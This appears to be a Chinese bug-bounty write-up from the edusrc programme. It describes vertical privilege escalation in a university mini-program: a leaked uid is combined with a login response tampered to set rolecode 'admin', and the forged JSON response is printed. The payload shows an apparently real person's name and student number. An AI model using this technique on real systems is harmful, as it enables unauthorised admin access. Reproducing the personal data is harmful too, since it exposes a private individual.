edusrc证书站漏洞挖掘(垂直越权)

发布于 作者:

edusrc证书站漏洞挖掘(垂直越权)

PWN师傅 PwnPigPig 2024-03-24 10:58

点击「蓝色」字体关注我们!

edusrc证书站漏洞挖掘(垂直越权) -1

edusrc证书站漏洞挖掘(垂直越权) -2

edusrc证书站漏洞挖掘(垂直越权) -3

一眼定睛

edusrc证书站漏洞挖掘(垂直越权) -4

来到该小程序

使用统一身份认证登录后

来到如下这个位置

edusrc证书站漏洞挖掘(垂直越权) -6

今日排班接口处泄露uid

edusrc证书站漏洞挖掘(垂直越权) -7

小程序所有鉴权都是靠 uid 鉴权的

edusrc证书站漏洞挖掘(垂直越权) -8

借助泄露的uid值

我们重新回到统一登录进行登录

抓取响应包改为如下: 

{"data":{"uid":"4d1cda65a7ce00000000000000005***(打码)","email":"","mobilePhon e":"","qq":"","sex":"","realname":"黄智霖","username":"2111906121","rolecode":"admin","position":null,"personnel_natu re":"none_user","avatarUrl":null,"company_id":null,"departname":"","schools":[], "loginStatue":null},"errCode":"200","errMessage":"ok"}

放包后进入,功能点全部可用

edusrc证书站漏洞挖掘(垂直越权) -11

edusrc证书站漏洞挖掘(垂直越权) -12

成功垂直越权获得管理员权限

edusrc证书站漏洞挖掘(垂直越权) -14

edusrc证书站漏洞挖掘(垂直越权) -15

PwnPigPig知识星球(限时优惠劵)

edusrc证书站漏洞挖掘(垂直越权) -16

edusrc证书站漏洞挖掘(垂直越权) -14

edusrc证书站漏洞挖掘(垂直越权) -15

edusrc证书站漏洞挖掘(垂直越权) -18

edusrc证书站漏洞挖掘(垂直越权) -19

# 往期推荐 #

edusrc证书站漏洞挖掘(垂直越权) -20

edusrc小程序漏洞挖掘思路(越权+逻辑)

一次配合任意密码重置逻辑+越权的组合拳打法

cnvd通用型漏洞挖掘思路-从逻辑漏洞到拒绝服务漏洞

PwnPigPig交流群

交流群人数已满,加我微信号PWNCat拉入

edusrc证书站漏洞挖掘(垂直越权) -21

~